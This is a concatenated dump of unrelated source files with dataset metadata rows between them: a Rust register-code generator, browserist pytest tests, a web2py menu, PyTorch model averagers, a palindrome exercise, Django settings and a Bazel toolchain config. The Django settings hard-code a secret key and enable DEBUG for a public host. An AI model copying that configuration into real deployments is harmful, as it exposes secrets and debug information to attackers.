g=str(type(self).__name__),
out=outpath,
exception=e)
raise PalGeneratorException(msg)
def _generate_register(self, outfile, reg):
self.writer.declare_register_dependencies(outfile, reg, self.config)
if self.config.enable_printers == True:
self.writer.declare_print_mechanism_dependencies(outfile, reg)
for am_key, am_list in reg.access_mechanisms.items():
for am in am_list:
self.writer.declare_access_mechanism_dependencies(outfile, reg, am)
self.writer.write_newline(outfile)
self._generate_register_comment(outfile, reg)
self.writer.declare_register_accessors(outfile, reg)
for idx, fieldset in enumerate(reg.fieldsets):
if fieldset.condition:
self.writer.declare_comment(outfile, fieldset.condition, 79)
for field in fieldset.fields:
self.writer.declare_field_accessors(outfile, reg, field)
if self.config.enable_printers == True:
self.writer.declare_field_printers(outfile, reg, field)
if reg.is_readable() and self.config.enable_printers == True:
self.writer.declare_fieldset_printers(outfile, reg, fieldset)
def _generate_instruction(self, outfile, inst):
self.writer.declare_instruction_dependencies(outfile, inst, self.config)
self.writer.declare_instruction_accessor(outfile, inst)
self.writer.write_newline(outfile)
def _generate_register_comment(self, outfile, reg):
comment = "{name} ({long_name}){separator}{purpose}".format(
name=str(reg.name),
long_name=str(reg.long_name),
separator=" - " if reg.purpose else "",
purpose=str(reg.purpose)
)
self.writer.declare_comment(outfile, comment, 75)
def __update_module_files(self, outpath):
modfile_path = os.path.join(outpath, "mod.rs")
modfile_path = os.path.abspath(modfile_path)
for root, dirs, files in os.walk(outpath):
logger.info("Updating modfile: " + os.path.join(root, "mod.rs"))
with open(os.path.join(root, "mod.rs"), "w") as modfile:
for name in sorted(files):
if name != "mod.rs" and name.endswith(".rs"):
modname = os.path.splitext(name)[0]
modfile.write("pub mod " + modname + ";")
self.writer.write_newline(modfile)
modfile.write("pub use " + modname + "::*;")
self.writer.write_newline(modfile)
for name in sorted(dirs):
modname = os.path.splitext(name)[0]
modfile.write("pub mod " + modname + ";")
self.writer.write_newline(modfile)
modfile.write("pub use " + modname + "::*;")
self.writer.write_newline(modfile)
def __update_lib_file(self, outpath):
libfile_path = os.path.abspath(os.path.join(outpath, "lib.rs"))
libfile_dir = os.path.abspath(outpath)
if not os.path.exists(libfile_path):
libfile_path = os.path.abspath(os.path.join(outpath, "../lib.rs"))
libfile_dir = os.path.abspath(os.path.join(outpath, "../"))
if not os.path.exists(libfile_path):
return
logger.info("Updating lib.rs: " + str(libfile_path))
with open(libfile_path, "w") as libfile:
for child in [f.path for f in os.scandir(libfile_dir)]:
logger.info("child: " + str(child))
modname = os.path.splitext(os.path.basename(child))[0]
if not modname == "lib":
libfile.write("pub mod " + modname + ";")
self.writer.write_newline(libfile)
| true
| true
|
790dd884584a8f5b70472b478f3fbd6d4b1e067e
| 1,498
|
py
|
Python
|
test/browser/window/controller/remove_handle_by_id_test.py
|
jakob-bagterp/browserist
|
76bd916dd217b7da3759fd6ec3374191002dc091
|
[
"Apache-2.0"
] | 2
|
2022-02-20T10:03:19.000Z
|
2022-03-22T11:17:10.000Z
|
test/browser/window/controller/remove_handle_by_id_test.py
|
jakob-bagterp/browserist
|
76bd916dd217b7da3759fd6ec3374191002dc091
|
[
"Apache-2.0"
] | null | null | null |
test/browser/window/controller/remove_handle_by_id_test.py
|
jakob-bagterp/browserist
|
76bd916dd217b7da3759fd6ec3374191002dc091
|
[
"Apache-2.0"
] | null | null | null |
from contextlib import nullcontext as does_not_raise
from typing import Any
import pytest
from _mock_data.window_handles import WINDOW_HANDLE_1_ID, WINDOW_HANDLE_4_ID
from browserist.exception.window_handle import WindowHandleIdNotFoundError, WindowHandleIdNotValidError
from browserist.model.window.controller import WindowHandleController
@pytest.mark.parametrize("id", [
(WINDOW_HANDLE_1_ID),
])
def test_window_handle_controller_remove_handle_by_id(id: str, window_handle_controller: WindowHandleController) -> None:
assert window_handle_controller.count() == 3
window_handle_controller.remove_handle_by_id(id)
assert window_handle_controller.count() == 2
@pytest.mark.parametrize("id, expectation", [
(WINDOW_HANDLE_1_ID, does_not_raise()),
("Not valid ID", pytest.raises(WindowHandleIdNotValidError)),
])
def test_window_handle_controller_remove_handle_by_id_invalid_error(id: str, expectation: Any, window_handle_controller: WindowHandleController) -> None:
with expectation:
window_handle_controller.remove_handle_by_id(id) is not None
@pytest.mark.parametrize("id, expectation", [
(WINDOW_HANDLE_1_ID, does_not_raise()),
(WINDOW_HANDLE_4_ID, pytest.raises(WindowHandleIdNotFoundError)),
])
def test_window_handle_controller_remove_handle_by_id_not_found_error(id: str, expectation: Any, window_handle_controller: WindowHandleController) -> None:
with expectation:
window_handle_controller.remove_handle_by_id(id) is not None
| 41.611111
| 155
| 0.814419
|
from contextlib import nullcontext as does_not_raise
from typing import Any
import pytest
from _mock_data.window_handles import WINDOW_HANDLE_1_ID, WINDOW_HANDLE_4_ID
from browserist.exception.window_handle import WindowHandleIdNotFoundError, WindowHandleIdNotValidError
from browserist.model.window.controller import WindowHandleController
@pytest.mark.parametrize("id", [
(WINDOW_HANDLE_1_ID),
])
def test_window_handle_controller_remove_handle_by_id(id: str, window_handle_controller: WindowHandleController) -> None:
assert window_handle_controller.count() == 3
window_handle_controller.remove_handle_by_id(id)
assert window_handle_controller.count() == 2
@pytest.mark.parametrize("id, expectation", [
(WINDOW_HANDLE_1_ID, does_not_raise()),
("Not valid ID", pytest.raises(WindowHandleIdNotValidError)),
])
def test_window_handle_controller_remove_handle_by_id_invalid_error(id: str, expectation: Any, window_handle_controller: WindowHandleController) -> None:
with expectation:
window_handle_controller.remove_handle_by_id(id) is not None
@pytest.mark.parametrize("id, expectation", [
(WINDOW_HANDLE_1_ID, does_not_raise()),
(WINDOW_HANDLE_4_ID, pytest.raises(WindowHandleIdNotFoundError)),
])
def test_window_handle_controller_remove_handle_by_id_not_found_error(id: str, expectation: Any, window_handle_controller: WindowHandleController) -> None:
with expectation:
window_handle_controller.remove_handle_by_id(id) is not None
| true
| true
|
790dd8b5cd7edaafbdebd0957f76e3486a2f9a9e
| 6,153
|
py
|
Python
|
applications/javelin/models/menu.py
|
jjacobson93/javelin-web2py
|
d4de493156c6893acca74d4be7f4597c90c418f3
|
[
"BSD-3-Clause"
] | null | null | null |
applications/javelin/models/menu.py
|
jjacobson93/javelin-web2py
|
d4de493156c6893acca74d4be7f4597c90c418f3
|
[
"BSD-3-Clause"
] | null | null | null |
applications/javelin/models/menu.py
|
jjacobson93/javelin-web2py
|
d4de493156c6893acca74d4be7f4597c90c418f3
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# this file is released under public domain and you can use without limitations
#########################################################################
## Customize your APP title, subtitle and menus here
#########################################################################
response.logo = A('Javelin',_class="brand",_href="/")
response.title = request.application.replace('_',' ').title()
## read more at http://dev.w3.org/html5/markup/meta.name.html
response.meta.author = 'Your Name <you@example.com>'
response.meta.description = 'a cool new app'
response.meta.keywords = 'web2py, python, framework'
response.meta.generator = 'Web2py Web Framework'
## your http://google.com/analytics id
response.google_analytics_id = None
#########################################################################
## this is the main application menu add/remove items as required
#########################################################################
response.menu = [
(T('Home'), False, URL('default', 'index'), [])
]
DEVELOPMENT_MENU = True
#########################################################################
## provide shortcuts for development. remove in production
#########################################################################
def _():
# shortcuts
app = request.application
ctr = request.controller
# useful links to internal and external resources
response.menu += [
(SPAN('web2py', _class='highlighted'), False, 'http://web2py.com', [
(T('My Sites'), False, URL('admin', 'default', 'site')),
(T('This App'), False, URL('admin', 'default', 'design/%s' % app), [
(T('Controller'), False,
URL(
'admin', 'default', 'edit/%s/controllers/%s.py' % (app, ctr))),
(T('View'), False,
URL(
'admin', 'default', 'edit/%s/views/%s' % (app, response.view))),
(T('Layout'), False,
URL(
'admin', 'default', 'edit/%s/views/layout.html' % app)),
(T('Stylesheet'), False,
URL(
'admin', 'default', 'edit/%s/static/css/web2py.css' % app)),
(T('DB Model'), False,
URL(
'admin', 'default', 'edit/%s/models/db.py' % app)),
(T('Menu Model'), False,
URL(
'admin', 'default', 'edit/%s/models/menu.py' % app)),
(T('Database'), False, URL(app, 'appadmin', 'index')),
(T('Errors'), False, URL(
'admin', 'default', 'errors/' + app)),
(T('About'), False, URL(
'admin', 'default', 'about/' + app)),
]),
('web2py.com', False, 'http://www.web2py.com', [
(T('Download'), False,
'http://www.web2py.com/examples/default/download'),
(T('Support'), False,
'http://www.web2py.com/examples/default/support'),
(T('Demo'), False, 'http://web2py.com/demo_admin'),
(T('Quick Examples'), False,
'http://web2py.com/examples/default/examples'),
(T('FAQ'), False, 'http://web2py.com/AlterEgo'),
(T('Videos'), False,
'http://www.web2py.com/examples/default/videos/'),
(T('Free Applications'),
False, 'http://web2py.com/appliances'),
(T('Plugins'), False, 'http://web2py.com/plugins'),
(T('Layouts'), False, 'http://web2py.com/layouts'),
(T('Recipes'), False, 'http://web2pyslices.com/'),
(T('Semantic'), False, 'http://web2py.com/semantic'),
]),
(T('Documentation'), False, 'http://www.web2py.com/book', [
(T('Preface'), False,
'http://www.web2py.com/book/default/chapter/00'),
(T('Introduction'), False,
'http://www.web2py.com/book/default/chapter/01'),
(T('Python'), False,
'http://www.web2py.com/book/default/chapter/02'),
(T('Overview'), False,
'http://www.web2py.com/book/default/chapter/03'),
(T('The Core'), False,
'http://www.web2py.com/book/default/chapter/04'),
(T('The Views'), False,
'http://www.web2py.com/book/default/chapter/05'),
(T('Database'), False,
'http://www.web2py.com/book/default/chapter/06'),
(T('Forms and Validators'), False,
'http://www.web2py.com/book/default/chapter/07'),
(T('Email and SMS'), False,
'http://www.web2py.com/book/default/chapter/08'),
(T('Access Control'), False,
'http://www.web2py.com/book/default/chapter/09'),
(T('Services'), False,
'http://www.web2py.com/book/default/chapter/10'),
(T('Ajax Recipes'), False,
'http://www.web2py.com/book/default/chapter/11'),
(T('Components and Plugins'), False,
'http://www.web2py.com/book/default/chapter/12'),
(T('Deployment Recipes'), False,
'http://www.web2py.com/book/default/chapter/13'),
(T('Other Recipes'), False,
'http://www.web2py.com/book/default/chapter/14'),
(T('Buy this book'), False,
'http://stores.lulu.com/web2py'),
]),
(T('Community'), False, None, [
(T('Groups'), False,
'http://www.web2py.com/examples/default/usergroups'),
(T('Twitter'), False, 'http://twitter.com/web2py'),
(T('Live Chat'), False,
'http://webchat.freenode.net/?channels=web2py'),
]),
(T('Plugins'), False, None, [
('plugin_wiki', False,
'http://web2py.com/examples/default/download'),
(T('Other Plugins'), False,
'http://web2py.com/plugins'),
(T('Layout Plugins'),
False, 'http://web2py.com/layouts'),
])
]
)]
if DEVELOPMENT_MENU: _()
if "auth" in locals(): auth.wikimenu()
| 44.266187
| 79
| 0.478628
| true
| true
|
|
790dd98e40c32e5ef94d00d466dc9334c2cc8fca
| 376
|
py
|
Python
|
noncookingjob.py
|
vmlane/jobMatcher
|
f5929134e6e14786ca9f71cc0329f0fed59b35da
|
[
"MIT"
] | null | null | null |
noncookingjob.py
|
vmlane/jobMatcher
|
f5929134e6e14786ca9f71cc0329f0fed59b35da
|
[
"MIT"
] | null | null | null |
noncookingjob.py
|
vmlane/jobMatcher
|
f5929134e6e14786ca9f71cc0329f0fed59b35da
|
[
"MIT"
] | null | null | null |
from job import *
class NoncookingJob(Job):
def __init__(self, name, prefs, maxMatches):
Job.__init__(self, name, prefs, maxMatches)
# remove pairs & underclassmen
self.prefs = filter(lambda x: x.numPeople != 1 and x.semsCooked < 4, self.prefs)
# sort all the people by number of semesters cooked, high to low
prefs.sort(key=lambda x: x.semsCooked, reverse=True)
| 37.6
| 83
| 0.728723
|
from job import *
class NoncookingJob(Job):
def __init__(self, name, prefs, maxMatches):
Job.__init__(self, name, prefs, maxMatches)
self.prefs = filter(lambda x: x.numPeople != 1 and x.semsCooked < 4, self.prefs)
prefs.sort(key=lambda x: x.semsCooked, reverse=True)
| true
| true
|
790ddbcd7888dfff9258436b8a98ccebabef1cd9
| 4,941
|
py
|
Python
|
torch/distributed/algorithms/model_averaging/averagers.py
|
vuanvin/pytorch
|
9267fd8d7395074001ad7cf2a8f28082dbff6b0b
|
[
"Intel"
] | 1
|
2022-01-20T03:49:23.000Z
|
2022-01-20T03:49:23.000Z
|
torch/distributed/algorithms/model_averaging/averagers.py
|
vuanvin/pytorch
|
9267fd8d7395074001ad7cf2a8f28082dbff6b0b
|
[
"Intel"
] | 14
|
2021-10-14T06:58:50.000Z
|
2021-12-17T11:51:07.000Z
|
torch/distributed/algorithms/model_averaging/averagers.py
|
vuanvin/pytorch
|
9267fd8d7395074001ad7cf2a8f28082dbff6b0b
|
[
"Intel"
] | null | null | null |
import warnings
from abc import ABC, abstractmethod
import torch.distributed as dist
import torch.distributed.algorithms.model_averaging.utils as utils
class ModelAverager(ABC):
r"""Base class for all model averagers.
Args:
process_group: The process group to be used for all-reduce.
If ``None``, the default process group, which
is created by :func:`torch.distributed.init_process_group`,
will be used. (default: ``None``)
"""
def __init__(self, process_group=None):
self.process_group = (
process_group if process_group is not None else dist.group.WORLD
)
self.step = 0
@abstractmethod
def average_parameters(self, params):
raise NotImplementedError
class PeriodicModelAverager(ModelAverager):
r"""
Averages parameters periodically after the warm-up stage.
This can be used for running `post-local SGD <https://arxiv.org/abs/1808.07217>`_,
by running :class:`~torch.nn.DistributedDataParallel` (DDP)
using the subgroups created by :meth:`~torch.distributed.new_subgroups`.
Args:
period (int): The number of steps per model averaging.
Usually the period should be greater than ``1`` to reduce the communication cost.
Otherwise, only DDP needs to be used.
warmup_steps (int): The number of warm-up steps. During this stage,
model averaging is skipped.
process_group: The process group to be used for all-reduce.
If ``None``, the default process group, which
is created by :func:`torch.distributed.init_process_group`,
will be used. (default: ``None``)
Example::
>>> import torch
>>> import torch.distributed as dist
>>> import torch.distributed.algorithms.ddp_comm_hooks.post_localSGD_hook as post_localSGD
>>> import torch.distributed.algorithms.model_averaging.averagers as averagers
>>> import torch.nn as nn
>>>
>>> dist.init_process_group("nccl", rank=rank, world_size=16)
>>> torch.cuda.set_device(rank)
>>> module = nn.Linear(1, 1, bias=False).to(rank)
>>> model = nn.parallel.DistributedDataParallel(
>>> module, device_ids=[rank], output_device=rank
>>> )
>>> # Register a post-localSGD communication hook.
>>> subgroup, subgroups = dist.new_subgroups()
>>> state = PostLocalSGDState(subgroup=subgroup, start_localSGD_iter=100)
>>> model.register_comm_hook(state, post_localSGD_hook)
>>>
>>> # In the first 100 steps, run global gradient averaging like normal DDP at every step.
>>> # After 100 steps, run model averaging every 4 steps.
>>> # Note that ``warmup_steps`` must be the same as ``start_localSGD_iter`` used in ``PostLocalSGDState``.
>>> averager = averagers.PeriodicModelAverager(period=4, warmup_steps=100)
>>> for step in range(0, 200):
>>> optimizer.zero_grad()
>>> loss = loss_fn(output, labels)
>>> loss.backward()
>>> optimizer.step()
>>> # Average parameters globally after ``optimizer.step()``.
>>> # Thus, the inter-node communication only occurs periodically after ``warmup_steps``.
>>> averager.average_parameters(model.parameters())
.. warning ::
`PeriodicModelAverager` is experimental and subject to change.
"""
def __init__(
self,
period,
warmup_steps=0,
process_group=None,
):
super().__init__(process_group)
if warmup_steps < 0:
raise ValueError("Arg ``warmup_steps`` must be a non-negative number.")
self.warmup_steps = warmup_steps
if period < 1:
raise ValueError("Arg ``period`` must be a positive value.")
elif period == 1:
warnings.warn(
"When period is 1, no need to use model averaging because the communication cost "
"of all-reducing parameters will be no less than the cost of all-reducing gradients "
"by DistributedDataParall in the backward pass. Therefore, only "
"DistributedDataParallel should be used for this case."
)
self.period = period
def average_parameters(self, params):
r"""
Averages parameters if ``step`` is no less than ``warmup_steps``
and it can be divided by ``period``, where ``step`` is increased by 1
at each iteration in the training loop.
"""
if (
self.step >= self.warmup_steps
and (self.step - self.warmup_steps) % self.period == 0
):
utils.average_parameters(iter(params), self.process_group)
self.step += 1
| 42.230769
| 116
| 0.612224
|
import warnings
from abc import ABC, abstractmethod
import torch.distributed as dist
import torch.distributed.algorithms.model_averaging.utils as utils
class ModelAverager(ABC):
def __init__(self, process_group=None):
self.process_group = (
process_group if process_group is not None else dist.group.WORLD
)
self.step = 0
@abstractmethod
def average_parameters(self, params):
raise NotImplementedError
class PeriodicModelAverager(ModelAverager):
def __init__(
self,
period,
warmup_steps=0,
process_group=None,
):
super().__init__(process_group)
if warmup_steps < 0:
raise ValueError("Arg ``warmup_steps`` must be a non-negative number.")
self.warmup_steps = warmup_steps
if period < 1:
raise ValueError("Arg ``period`` must be a positive value.")
elif period == 1:
warnings.warn(
"When period is 1, no need to use model averaging because the communication cost "
"of all-reducing parameters will be no less than the cost of all-reducing gradients "
"by DistributedDataParall in the backward pass. Therefore, only "
"DistributedDataParallel should be used for this case."
)
self.period = period
def average_parameters(self, params):
if (
self.step >= self.warmup_steps
and (self.step - self.warmup_steps) % self.period == 0
):
utils.average_parameters(iter(params), self.process_group)
self.step += 1
| true
| true
|
790ddc222efaf49cc540383db964dfb094041101
| 1,097
|
py
|
Python
|
Day 18/Queue and stacks.py
|
SayanBan/HackerRank-30-Days-of-code
|
c2fea8304d7c9af13748fcce57c07a7ca180eda4
|
[
"MIT"
] | 2
|
2019-11-20T04:45:27.000Z
|
2019-12-07T04:31:47.000Z
|
Day 18/Queue and stacks.py
|
SayanBan/HackerRank-30-Days-of-code
|
c2fea8304d7c9af13748fcce57c07a7ca180eda4
|
[
"MIT"
] | null | null | null |
Day 18/Queue and stacks.py
|
SayanBan/HackerRank-30-Days-of-code
|
c2fea8304d7c9af13748fcce57c07a7ca180eda4
|
[
"MIT"
] | 1
|
2019-12-07T04:31:59.000Z
|
2019-12-07T04:31:59.000Z
|
import sys
class Solution:
# Write your code here
def __init__(self):
self.stack = []
self.queue = []
def popCharacter(self):
return self.stack.pop()
def pushCharacter(self, char):
self.stack.append(char)
def dequeueCharacter(self):
char = self.queue[0]
self.queue = self.queue[1:]
return char
def enqueueCharacter(self, char):
self.queue.append(char)
# read the string s
s=input()
#Create the Solution class object
obj=Solution()
l=len(s)
# push/enqueue all the characters of string s to stack
for i in range(l):
obj.pushCharacter(s[i])
obj.enqueueCharacter(s[i])
isPalindrome=True
'''
pop the top character from stack
dequeue the first character from queue
compare both the characters
'''
for i in range(l // 2):
if obj.popCharacter()!=obj.dequeueCharacter():
isPalindrome=False
break
#finally print whether string s is palindrome or not.
if isPalindrome:
print("The word, "+s+", is a palindrome.")
else:
print("The word, "+s+", is not a palindrome.")
| 22.854167
| 54
| 0.646308
|
import sys
class Solution:
def __init__(self):
self.stack = []
self.queue = []
def popCharacter(self):
return self.stack.pop()
def pushCharacter(self, char):
self.stack.append(char)
def dequeueCharacter(self):
char = self.queue[0]
self.queue = self.queue[1:]
return char
def enqueueCharacter(self, char):
self.queue.append(char)
s=input()
obj=Solution()
l=len(s)
for i in range(l):
obj.pushCharacter(s[i])
obj.enqueueCharacter(s[i])
isPalindrome=True
for i in range(l // 2):
if obj.popCharacter()!=obj.dequeueCharacter():
isPalindrome=False
break
if isPalindrome:
print("The word, "+s+", is a palindrome.")
else:
print("The word, "+s+", is not a palindrome.")
| true
| true
|
790ddc9a7829e5f42dca0f59b4903dfd9d2f3621
| 4,564
|
py
|
Python
|
locallibrary/settings.py
|
TheRedemp7ion/DjangoLocalLibrary
|
e3c49da272d863185681b2b934c45a4693054a7a
|
[
"Unlicense"
] | null | null | null |
locallibrary/settings.py
|
TheRedemp7ion/DjangoLocalLibrary
|
e3c49da272d863185681b2b934c45a4693054a7a
|
[
"Unlicense"
] | null | null | null |
locallibrary/settings.py
|
TheRedemp7ion/DjangoLocalLibrary
|
e3c49da272d863185681b2b934c45a4693054a7a
|
[
"Unlicense"
] | null | null | null |
"""
Django settings for locallibrary project.
Generated by 'django-admin startproject' using Django 3.2.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import pytz
import os # needed by code below
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-@*cqyd6l)4*=yg7r19zmp#y32mpus(a2d-)ny&hstt^kq!13jk'
import os
#SECRET_KEY = os.environ.get('DJANGO_SECRET_KEY', 'cg#p$g+j9tax!#a3cup@1$8obt2_+&k3q+pmu)5%asj6yjpkag')
#with open('/etc/secret_key.txt') as f:
# SECRET_KEY = f.read().strip()
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['obscure-plateau-04602.herokuapp.com']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'catalog.apps.CatalogConfig',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'whitenoise.middleware.WhiteNoiseMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'locallibrary.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'locallibrary.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Kolkata'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
# Redirect to home URL after login (Default redirects to /accounts/profile/)
LOGIN_REDIRECT_URL = '/'
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
# to view it console, never add in actual site
# Heroku: Update database configuration from $DATABASE_URL.
import dj_database_url
db_from_env = dj_database_url.config(conn_max_age=500)
DATABASES['default'].update(db_from_env)
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
# The absolute path to the directory where collectstatic will collect static files for deployment.
STATIC_ROOT = BASE_DIR / 'staticfiles'
# The URL to use when referring to static files (where they will be served from)
STATIC_URL = '/static/'
# Simplified static file serving.
# https://warehouse.python.org/project/whitenoise/
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
| 29.070064
| 103
| 0.724803
|
from pathlib import Path
import pytz
import os
BASE_DIR = Path(__file__).resolve().parent.parent
SECRET_KEY = 'django-insecure-@*cqyd6l)4*=yg7r19zmp#y32mpus(a2d-)ny&hstt^kq!13jk'
import os
DEBUG = True
ALLOWED_HOSTS = ['obscure-plateau-04602.herokuapp.com']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'catalog.apps.CatalogConfig',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'whitenoise.middleware.WhiteNoiseMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'locallibrary.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'locallibrary.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Kolkata'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
# Redirect to home URL after login (Default redirects to /accounts/profile/)
LOGIN_REDIRECT_URL = '/'
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
# to view it console, never add in actual site
# Heroku: Update database configuration from $DATABASE_URL.
import dj_database_url
db_from_env = dj_database_url.config(conn_max_age=500)
DATABASES['default'].update(db_from_env)
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
# The absolute path to the directory where collectstatic will collect static files for deployment.
STATIC_ROOT = BASE_DIR / 'staticfiles'
# The URL to use when referring to static files (where they will be served from)
STATIC_URL = '/static/'
# Simplified static file serving.
# https://warehouse.python.org/project/whitenoise/
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
| true
| true
|
790ddcb0947ec5c383af11aaf8bdbcf8ab880246
| 60,361
|
bzl
|
Python
|
third_party/toolchains/bazel_0.23.2_rbe_windows/cc_toolchain_config.bzl
|
suever/grpc
|
0bee8c41f9c52f81a06fbd8444b2d53249c484a9
|
[
"Apache-2.0"
] | 2
|
2019-05-26T05:00:55.000Z
|
2019-06-15T10:18:57.000Z
|
third_party/toolchains/bazel_0.23.2_rbe_windows/cc_toolchain_config.bzl
|
suever/grpc
|
0bee8c41f9c52f81a06fbd8444b2d53249c484a9
|
[
"Apache-2.0"
] | 2
|
2017-03-07T22:54:36.000Z
|
2017-04-14T15:17:36.000Z
|
third_party/toolchains/bazel_0.23.2_rbe_windows/cc_toolchain_config.bzl
|
suever/grpc
|
0bee8c41f9c52f81a06fbd8444b2d53249c484a9
|
[
"Apache-2.0"
] | 4
|
2020-08-10T06:05:01.000Z
|
2021-12-12T09:26:50.000Z
|
# Copyright 2019 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A Starlark cc_toolchain configuration rule"""
load(
"@bazel_tools//tools/cpp:cc_toolchain_config_lib.bzl",
"action_config",
"artifact_name_pattern",
"env_entry",
"env_set",
"feature",
"feature_set",
"flag_group",
"flag_set",
"make_variable",
"tool",
"tool_path",
"variable_with_value",
"with_feature_set",
)
load("@bazel_tools//tools/build_defs/cc:action_names.bzl", "ACTION_NAMES")
all_compile_actions = [
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.clif_match,
ACTION_NAMES.lto_backend,
]
all_cpp_compile_actions = [
ACTION_NAMES.cpp_compile,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.clif_match,
]
preprocessor_compile_actions = [
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.clif_match,
]
codegen_compile_actions = [
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
]
all_link_actions = [
